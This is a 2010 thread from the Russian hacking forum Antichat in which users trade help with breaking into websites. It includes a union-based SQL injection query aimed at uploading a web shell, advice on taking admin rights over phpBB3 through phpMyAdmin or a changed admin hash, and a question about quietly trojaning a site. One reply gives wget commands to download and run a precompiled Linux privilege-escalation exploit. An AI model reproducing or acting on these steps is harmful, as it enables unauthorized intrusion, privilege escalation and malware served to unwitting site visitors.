Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

08.05.2010, 21:51
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от olishort
Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on
?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--
выводится 2 и 8. file_priv = Y
Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается
load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)
Сообщение от GOGA075
А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
|
|
|

08.05.2010, 22:26
|
|
Новичок
Регистрация: 20.01.2010
Сообщений: 4
Провел на форуме: 19629
Репутация:
0
|
|
нашел уязвимость "вставление пхп кода":PHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
как можно етим воспользоватса?
еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
|
|
|

08.05.2010, 22:40
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме: 698831
Репутация:
34
|
|
скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
|
|
|

08.05.2010, 22:53
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме: 436858
Репутация:
33
|
|
Сообщение от попугай
load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)
посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.
p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex
Последний раз редактировалось olishort; 08.05.2010 в 23:09..
|
|
|

08.05.2010, 23:02
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от daniel_1024
скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
|
|
|

08.05.2010, 23:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от olishort
у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.
p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex
прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса
|
|
|

09.05.2010, 00:17
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
подниму вопрос свой
Сообщение от GOGA075
А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
|
|
|

09.05.2010, 00:26
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме: 29188
Репутация:
0
|
|
Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.
|
|
|

09.05.2010, 00:39
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме: 29188
Репутация:
0
|
|
Сообщение от GOGA075
подниму вопрос свой
А не легче ли поправить хешь админа потом зайти под его правами и дать себе полномочия.
|
|
|

09.05.2010, 01:19
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Есть файл .htaccess
в нем
<Files *>
Order Allow,Deny
Alow from All
</Files>
из-за него выдает ошибку 500 какуюто.
Нужно шоб файлл shell.php читался свободно!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|